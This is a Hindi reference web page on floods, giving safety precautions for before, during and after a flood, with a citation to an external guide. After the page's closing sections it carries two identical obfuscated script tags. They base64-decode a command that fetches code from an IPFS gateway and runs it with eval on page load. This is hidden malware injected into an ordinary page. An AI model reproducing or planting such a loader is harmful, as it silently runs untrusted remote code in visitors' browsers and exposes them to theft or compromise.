एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "१"।

बाढ़

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

बाढ़ आमतौर पर निरंतर मूसलाधार बरसात या गरजदार तूफ़ान के कारण होती है, लेकिन यह सुनामी और तटीय तूफ़ानी जलमग्‍नता का भी परिणाम हो सकता है। बाढ़ खतरनाक हो सकती है यदि:

  • पानी काफ़ी गहरा हो या बहुत तेज़ीसे बह रहा हो
  • बाढ़ बहुत तेज़ीसे बढ़ी हो
  • बाढ़ के पानी में मलबा, जैसे कि पेड़ और नालीदार इस्‍पाती चादरें आदि बहे चले आ रहे हों

सावधानियाँ एवं उपाय

बाढ़ आने के पहले

अपनी स्‍थानीय काउंसिल से जानकारी पाएं कि क्‍या आपके घर या कारोबार को बाढ़ से खतरा है। स्‍थान ख़ाली करते हुए बच निकलने की योजनाओं तथा स्‍थानीय सार्वजनिक चेतावनी प्रणालियों के बारे में पूछें, और जानें कि किस तरह आप अपने घर और कारोबार के लिए भावी बाढ़ के जोखिम घटा सकते हैं, और यदि आपको स्‍थान छोड़कर बचकर निकलना पड़े तो आपको अपने पालतू पशुओं और पशुधन का क्‍या करना चाहिए।

  • जानकारी करें कि निकटतम ऊंची भूमि कहां पर है और वहां तक कैसे पहुंचा जाए।
  • एक घरेलू आपातकालीन योजना तैयार कर लें। अपने घर में अपने आपातकालीन बचाव वस्‍तुएं व्‍यवस्थित करें और इनका सही रखरखाव बनाए रखें, साथ ही एक साथ ले जाने योग्‍य गेटअवे किट (बचाव किट) भी तैयार करें।

बाढ़ के दौरान या जब बाढ़ सन्निकट हो

  • अपने स्‍थानीय रेडियो केन्‍द्रों का प्रसारण सुनें जहां आपातस्थिति प्रबंधन कर्मचारी, आपके समुदाय और परिस्थिति के लिए सबसे उपयुक्‍त सलाह देंगे।
  • यदि आपको कोई अशक्‍तता (अक्षमता) है या सहारे की ज़रूरत है, तो अपने सहयोगी नेटवर्क से सम्‍पर्क करें।
  • अपनी घरेलू आपातकालीन योजना पर कार्रवाई करें और अपनी गेटअवे किट जांचें। यदि आवश्‍यक हो जाए तो तत्‍काल जगह छोड़कर निकलने की तैयारी करें।
  • जहां संभव हो, पालतू पशुओं को अंदर या एक सुरक्षित स्‍थल पर पहुंचाएं और पशुधन को ऊंची जगह पर पहुंचाएं।
  • अपने घर से पानी को दूर रखने के लिए बालू भरे बोरों को लगाने पर विचार करें।
  • कीमती घरेलू वस्‍तुओं को और रसायनों को फर्श से यथासंभव ऊंची जगह पर रखें।
  • यदि पानी प्रदूषित हो रहा हो तो बॉथटब, सिंक और स्‍टोरेज कंटेनरों को साफ पानी से भर कर रख लें।
  • उपयोगी सुविधाओं को बंद कर दें यदि प्राधिकारियों द्वारा ऐसा करने को कहा जाए क्‍योंकि ऐसा करना आपके घर या समुदाय को नुकसान पहुंचने से रोकने में मददगार हो सकता है। तीव्र बिजली के प्रवाह से क्षति पहुंचने से रोकने के लिए छोटे उपकरणों के प्‍लग निकाल दें।
  • बाढ़ के पानी में वाहन चलाकर जाने या पैदल निकलने की तब तक कोशिश न करें जब तक ऐसा करना बहुत ही ज़रूरी न हो।

बाढ़ के बाद

  • बाढ़ का पानी उतर जाने के बाद भी घर लौटना, सुरक्षित नहीं भी हो सकता है। नागरिक प्रतिरक्षा निर्देशों के लिए निरंतर अपने स्‍थानीय रेडियो केन्‍द्र का प्रसारण सुनें।
  • यदि कर सकें तो अन्‍य लोगों की, विशेषकर विशेष सहायता की ज़रूरत वाले लोगों की मदद करें।
  • बाढ़ के पानी से प्रदूषित खाद्य सामग्री खाने-पीने की डिब्‍बाबंद चीजों सहित सभी को फेंक दें।
  • नलों से आने वाले पानी को पीने या इससे खाना पकाने से बचें, जब तक कि आप निश्चित न कर लें कि यह प्रदूषित नहीं है। यदि संदेह हो, तो अपने लोकल काउंसिल या सार्वजनिक स्‍वास्‍थ्‍य प्राधिकारी से जांच कराएं।
  • उपयोगी सुविधाओं की टूटी लाईनों की जांच करें और समुचित प्राधिकारियों को इसकी रिपोर्ट करें।
  • यदि आपकी संपत्ति नष्‍ट हो गई हो, तो बीमा उद्देश्‍यों के लिए इसका विवरण लिखें और फोटो खींच लें। यदि आपकी सम्‍पत्ति किराए की है, तो जितनी जल्‍दी संभव हो सके अपने मकान-मालिक से सम्‍पर्क करें और अपनी संबंधित बीमा कंपनी से सम्‍पर्क करें।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. बाढ़ (हिंदी) get ready get thru। अभिगमन तिथि: 4 जुलाई, 2013।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>